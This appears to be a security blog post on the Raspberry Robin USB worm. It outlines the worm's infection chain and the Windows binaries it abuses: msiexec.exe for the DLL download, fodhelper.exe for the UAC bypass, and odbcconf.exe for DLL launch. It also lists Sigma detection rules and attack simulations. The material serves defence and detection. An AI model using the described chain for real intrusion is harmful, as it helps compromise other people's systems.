Raspberry Robin Worm infecting hundreds of Windows networks - Detection Sigma Rules

In a private threat intelligence advisory, Microsoft shared that the Raspberry Robin worm has compromised the networks of hundreds of organizations. The worm, which spreads via USB devices was first discovered by Red Canary in September 2021. The worm uses compromised QNAP NAS devices as command and control servers to serve malicious payloads and exfiltrate information.

What is Raspberry Robin worm?

The original report by Red Canary provides a detailed analysis of how Raspberry Robin spreads from USB devices, persists on user systems and hides it activity by abusing legitimate Windows binaries called LOLBins. We had also covered one such LOLBin, mavinject.exe recently.

Raspberry Robin gains initial access to a target via a malicious .lnk file present on a USB devices. cmd.exe /R executes the .lnk, which in turn uses msiexec.exe to download a malicious DLL from a remote URL (compromised QNAP NAS devices). msiexec.exe execution then spawns fodhelper.exe for privilege escalation and UAC Bypass launching an administrative cmd.exe shell. This shell is used to spawn rundll32.exe finally executes the malicious DLL via a LOLBin odbcconf.exe. After execution of the DLL, rundll32.exe constantly generates outbound traffic to TOR nodes for command and control.

Abusing Legitimate Binaries in Raspberry Robin campaign

Raspberry Robin campaigns utilize legitimate binaries for malicious purposes (LOLBins).

• fodhelper.exe - UAC Bypass and Execution.
• msiexec.exe - Downloading malicious DLL.
• odbcconf.exe - Launching malicious DLL.

Detect and Prevent Raspberry Robin

Florian Roth, the author of Sigma, posted a variety of sigma rules on twitter that are useful for detecting the techniques used by Raspberry Robin worm. You can find these rules here:

• Bypass UAC via Fodhelper.exe
• Msiexec Initiated Connection
• Suspicious Msiexec Quiet Install
• MsiExec Web Install
• Application Whitelisting Bypass via DLL Loaded by odbcconf.exe

You can also read our previous posts on how to utilize Sigma rules and make them work for your use case and security controls.

Simulating Raspberry Robin Worm

The Red Canary team has been up to the task and added several simulations to their open-source attack simulation project Atomic Red Team. These simulations cover the malicious usage of LOLBins employed by the Raspberry Robin malware.

At FourCore, we have built various simulations to validate detection rules as well behavioural detection capabilities of Security Controls to prevent Raspberry Robin infection. You can find simulations for Privilege Escalation via fodhelper.exe, simulating network traffic and exfiltration from rundll32.exe, malicious .lnk payloads, and more.

Our own open-source attack simulation harness, firedrill offers a simulation for privilege escalation and UAC Bypass using fodhelper.exe, which would be helpful to validate your detections.

References

• Red Canary Intelligence Report on Raspberry Robin
• Sigma rules capable of detecting Raspberry Robin techniques